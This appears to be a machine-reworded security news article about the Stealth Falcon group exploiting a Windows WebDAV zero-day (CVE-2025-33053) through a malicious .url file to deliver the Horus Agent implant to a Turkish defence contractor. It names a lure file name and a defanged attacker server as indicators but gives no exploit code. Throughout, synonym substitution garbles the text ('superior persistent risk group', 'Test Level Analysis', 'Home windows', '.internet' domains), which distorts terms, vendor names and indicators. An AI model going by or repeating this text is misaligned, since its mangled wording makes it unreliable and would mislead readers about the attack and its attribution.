A complicated cyberattack marketing campaign by the superior persistent risk group, Stealth Falcon, which exploited a beforehand unknown zero-day vulnerability to focus on a significant Turkish protection firm and execute malware remotely.
The assault leveraged CVE-2025-33053, a distant code execution vulnerability that permits risk actors to govern the working listing of reputable Home windows instruments to execute malicious recordsdata from attacker-controlled WebDAV servers.
Microsoft launched a safety patch for this vulnerability as a part of its June Patch Tuesday updates, following a accountable disclosure by Test Level Analysis.
The vulnerability was exploited by way of a malicious .url file named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” (Turkish for “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url”), which was doubtless distributed as an archived attachment in a spear-phishing e-mail focusing on the Turkish protection contractor.
The .url file pointed to iediagcmd.exe, a reputable Web Explorer diagnostics utility, however manipulated the working listing to reference an attacker-controlled WebDAV server at “summerartcamp[.]internet@ssl@443/DavWWWRootOSYxaOjr”.
This intelligent method exploited the search order utilized by the .NET Course of.Begin() technique, inflicting the reputable device to execute malicious recordsdata from the distant server as an alternative of system recordsdata.
This allowed arbitrary code execution by way of course of hollowing, because the malicious route.exe spawned from the WebDAV server, bypassed conventional signature-based defenses.
Certificates for a Malicious file (Supply: Test Level)
APT Hackers Exploited WebDAV Zero-Day
Stealth Falcon, often known as FruityArmor, is a sophisticated persistent risk group that has been conducting cyber espionage operations since at the very least 2012.
The group primarily targets high-profile entities within the Center East and Africa, with current operations noticed towards authorities and protection sectors in Turkey, Qatar, Egypt, and Yemen.
An infection chain (Supply: Test Level)
The assault delivered a multi-stage an infection chain, culminating within the deployment of “Horus Agent,” a custom-built implant for the Mythic command and management framework, in response to Test Level Analysis.
Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s beforehand used personalized Apollo implant. The malware employs superior anti-analysis strategies, together with code virtualization, string encryption, and API hashing, to evade detection.
Past the preliminary implant, researchers recognized a number of beforehand undisclosed {custom} instruments in Stealth Falcon’s arsenal, together with a DC Credential Dumper that bypasses file locks by accessing digital disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a {custom} keylogger with RC4 encryption.
The Horus Agent focuses on important reconnaissance features, permitting risk actors to fingerprint sufferer machines and assess their worth earlier than deploying extra superior payloads. This method helps defend the group’s refined post-exploitation instruments from publicity.
Stealth Falcon constantly makes use of repurposed reputable domains bought by way of NameCheap registrar, usually in .internet or .com top-level domains. This technique helps their infrastructure mix in with reputable site visitors, complicating attribution efforts.
The group’s continued evolution demonstrates its dedication to sustaining stealth and resilience in its operations, using business code obfuscation instruments and {custom} modifications that make its payloads tough to reverse-engineer and observe over time.
This newest marketing campaign highlights the continuing risk posed by refined APT teams, which mix zero-day exploits with revolutionary assault vectors, akin to WebDAV manipulation, to focus on important infrastructure and protection organizations worldwide.
Automate risk response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs throughout all endpoints -> Request full entry
